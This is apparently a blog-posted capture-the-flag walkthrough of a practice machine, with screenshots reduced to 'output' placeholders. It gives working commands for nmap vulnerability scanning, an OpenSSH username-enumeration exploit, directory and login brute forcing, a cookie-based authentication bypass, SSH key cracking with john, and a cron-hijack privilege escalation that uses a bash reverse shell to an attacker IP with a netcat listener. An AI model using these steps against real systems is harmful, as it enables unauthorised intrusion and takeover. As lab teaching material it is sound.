Complex Attack Types: Sample Scenarios 21

3 weeks ago 26
BOOK THIS SPACE FOR AD
ARTICLE AD

Baris Dincer

Another beautiful scenario is before you. This time, we will exploit the other machine and carry out some attacks both through the browser and through various tools.

It is very important for your abilities to be exposed to as many different scenarios as possible in this field.

Improve yourself tirelessly.

Do you want to start, punks?

You know what to do. Save the values ​​you will use most as constants on the shell. Never wait.

output

You can find various wordlists in /usr/share/wordlists.

Now it’s time to save the target IP value to our local DNS, this is an important step for some of our processes. Save it in /etc/hosts file.

output

Send a ping to the target machine and check.

output

We are ready now!

We can go exploring. Using Nmap, perform a scan of the open doors of the target machine. This could reveal the network: nmap -sV -sC -oA nmap_results/target_machine -A -T4 --script=vuln $target_ip

Service Version Detection (-sV): Identifies versions of running services on open ports.Default Scripts (-sC): Executes standard scripts that come with nmap.Output Formats (-oA): Saves the scan results in normal, grepable, and XML formats.Aggressive Scan (-A): Combines OS detection, service version detection, script scanning, and traceroute.Timing Template (-T4): Speeds up the scan process.Vulnerability Scripts (--script=vuln): Runs scripts that check for vulnerabilities.

You need to be patient. You will get good evidence from here.

output
output

We added a parameter for recording to the command so that you do not lose the results here and so that you can send specific queries. You can find them in the file location you specify.

output

We discovered that ports 22 (SSH) and 80 (HTTP) were open. Here we also have some additional notes about the version and potentially vulnerabilities.

Conduct an exploit investigation across versions.

output

There are some exploit approaches we can use for OpenSSH. Let’s download one for example: searchsploit -m linux/remote/45233.py

output

This python file is used for username enumeration. Check the content.

output

You should always explore how to use the script. Sometimes there are requirements for you to use it and you must install the necessary packages, it is always healthier to do these in a virtual environment you create.

We have deliberately received errors below. The Python version of the script you download may vary.

output

As you can see, it says we need to install a package. You can install this package and try running the script again.

We showed this as an example, we will not continue with this method.

We have a web server in front of us. We should go here and check the site.

output

You should check every detail that you can use in the real scenario and perform analysis on all possible pages. Conduct a directory reconnaissance attack to discover hidden pages and applications. We will use gobuster for this: gobuster dir -w $wordlist_dir -u ourtargetsite.thm -r

Depending on the length of the wordlist, it takes time for the result to appear.

output

As you can see, we discovered some pages. This is good news for us. In particular, we also have information that the /admin page is actively accessible.

Let’s go to the admin page and see what’s available.

output

The first thing that comes to mind is to try a brute force on the username and user password. This attack is often detected and blocked by firewalls in real scenarios. You should be wary of this.

As an example, let’s show you how to do this through the ffuf tool. Of course, there are different tools and you are free to use whatever you want.

First we need to explore the parameters we send with the POST request. You can learn this from the developer (f12) tools on your browser. You should look in the “Network” section. Let’s open this section and experiment with a random value.

output

You’ve seen the request payload form. We will use this.

Let’s go to the About section.

output

Some employees’ names are written, these could be potential usernames.

Let’s create our own wordlist.

output

Define this as a constant as “usernames_target”.

Try this command: ffuf -w $usernames_target:W1,$wordlist_pass:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://ourtargetsite.thm/admin -fc 200

output

We couldn’t get results. As we said, this is an example.

Let’s look at the source code of the admin page.

output

The first thing that catches our eye on the page are three separate .js files.

We can learn the working principle of the mechanism by looking at the “login.js” file.

output

It looks like an amateurish code flow with little thought to security principles. We can conduct research on this.

By examining the login.js file, we observe that a SessionToken cookie is created when the administrator credentials are validated successfully. This cookie is instrumental in maintaining the user's session and authenticating subsequent requests.

In the login.js file, the following actions typically occur:

User Login: When the admin enters their credentials (username and password) and submits the login form.Credential Verification: The credentials are sent to the server, where they are verified against stored data.SessionToken Generation: Upon successful verification of the admin credentials, the server generates a SessionToken.Cookie Setting: The SessionToken is then sent back to the client and stored as a cookie in the user's browser.

There is a gap in this structure. In the login.js file, the function handling the login process checks the server response to determine if the credentials are correct. If the response indicates "Incorrect Credentials," it displays an error message. If the credentials are correct, it sets a SessionToken cookie with the returned token and redirects the user to the admin dashboard. It will allow us to add any cookie value.

The code stipulates that if the server responds with “Incorrect credentials” access to the administrator’s panel should be denied to the user. Conversely, if the server does not respond with “Incorrect credentials” a session token should be issued to the user, granting them access to the administrative panel.

Let’s check our theory. Open “Storage” section.

output

Then add (+) item.

output

Now we restart the page.

output

We got RSA key. We also have the name “james” and “paradox”. Save it now.

output

We have id_rsa.hash file. We need to break this. We can use ssh2john to get the file into a format that we can use with john tool.

output
output

Now we can use john tool: john --wordlist=/usr/share/wordlists/rockyou.txt john_rsa

output

We got RSA passphrase.

Let’s create a connection request for this user via SSH. First, authorize the file containing the RSA you first saved.

output

Then connect: ssh -i id_rsa james@10.10.87.118

output

We got connection.

The first thing you should do is to check the privilege authority, we will increase the authority if necessary.

output

Ops… Listing our permisisons requires a password. Let’s look at the evidence.

output

We need to find a file that is “overpass”.

output
output

There is a strange encrypted message. We need to try break it. Use it https://www.dcode.fr/rot-47-cipher

output

We have a result. Let’s keep this:

[{"name":"System","pass":"saydrawnlyingpicture"}]

We need to list SUID executables: find / -perm -u=s -type f 2>/dev/null

output

There aren’t many useful details. Keep searching.

Let’s conduct an investigation on “crontab”.

output

We captured a recording of an interesting “.sh” file. “Curl” is running.

The request is made to “overpass.thm”. We might be able to modify the /etc/hosts file on our machine so that the target downloads a malicious “buildscript.sh” from us.

First, let’s create “/downloads/src/” in our own locale to preserve the file location.

output

Now create “buildscript.sh” and put the reverse shell code into it: bash -i >& /dev/tcp/10.10.255.233/9001 0>&1

output

Start a web server on our local machine.

output

Create a netcat listener: nc -nlvp 9001

output

Now let’s manipulate “/etc/hosts” on the target machine and add our own machine IP.

output
output
output

We are ready. Just wait to connection.

output
output

We got that.

Don’t give up on hacking.

Code for good.

^-^

Read Entire Article